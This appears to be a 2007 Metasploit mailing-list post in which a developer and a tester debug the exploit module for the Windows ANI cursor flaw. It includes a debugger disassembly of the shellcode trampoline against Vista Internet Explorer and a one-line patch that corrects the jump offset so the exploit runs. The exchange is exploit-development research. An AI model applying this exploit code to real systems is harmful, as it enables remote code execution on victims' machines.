[framework] Metasploit vs ANI

mmiller at hick.org mmiller at hick.org
Mon Apr 2 15:40:28 CDT 2007 

On Mon, Apr 02, 2007 at 10:32:54PM +0200, Nicolas RUFF wrote:
> To HDM and Rhys: thanks for your explanations on the style sheet trick -
> I missed this one. There *is* a second connection to get the ANI file.
> 
> However, I still feel like there is a bug somewhere. My victim is Vista
> 32-bit English. I attached Olly to IEXPLORE and an access violation is
> triggered in the following block (which is clearly a GetEIP):
> 
> 02C80EF3   EB 0F                 JMP SHORT 02C80F04
> 02C80EF5   68 BC040000           PUSH 4BC
> 02C80EFA   59                    POP ECX
> 02C80EFB   5E                    POP ESI
> 02C80EFC   29CC                  SUB ESP,ECX
> 02C80EFE   89E7                  MOV EDI,ESP
> 02C80F00   F3:A4                 REP MOVS BYTE PTR ES:[EDI],BYTE PTR
> DS:[ESI]
> 02C80F02   FFE4                  JMP ESP
> 02C80F04                         CALL 02C80EF5
> 
> This memory block belongs to:
> \Device\HarddiskVolume1\Users\[...]\Temporary Internet
> Files\Low\Content.IE5\BUURI5IQ\hMNjttkPdyba3xhJwbZa9FrbHegyoRkUeMVg74rfMvIceIwheWHyaB7zWJNzWKe5VoXHAAU47[1].zip
> 
> *However*, EIP value is 02C80EF4, so the sequence of bytes is
> interpreted as PUNPCKHBW instruction (nice one :). If I manually set EIP
> to 02C80EF3, exploit works fine.
> 
> There is some kind of "one-by-one" in the jump address - looks like you
> 0xCC'ed something :)

Thanks for the report, Nicolas.  I think you're right (although it's
pretty weird that this worked in my test environment).  

I'm not in a place to test this, but can you try this patch out and see if it
fixes the problem for you:

===================================================================
--- ani_loadimage_chunksize.rb  (revision 4626)
+++ ani_loadimage_chunksize.rb  (working copy)
@@ -283,7 +283,7 @@     
                        
                        # Replace the operand to the relative jump to point into the actual
                        # payload itself which comes after the riff chunk
-                       riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
+                       riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')
                end
                
                # Place the RIFF chunk in front and off we go

More information about the framework mailing list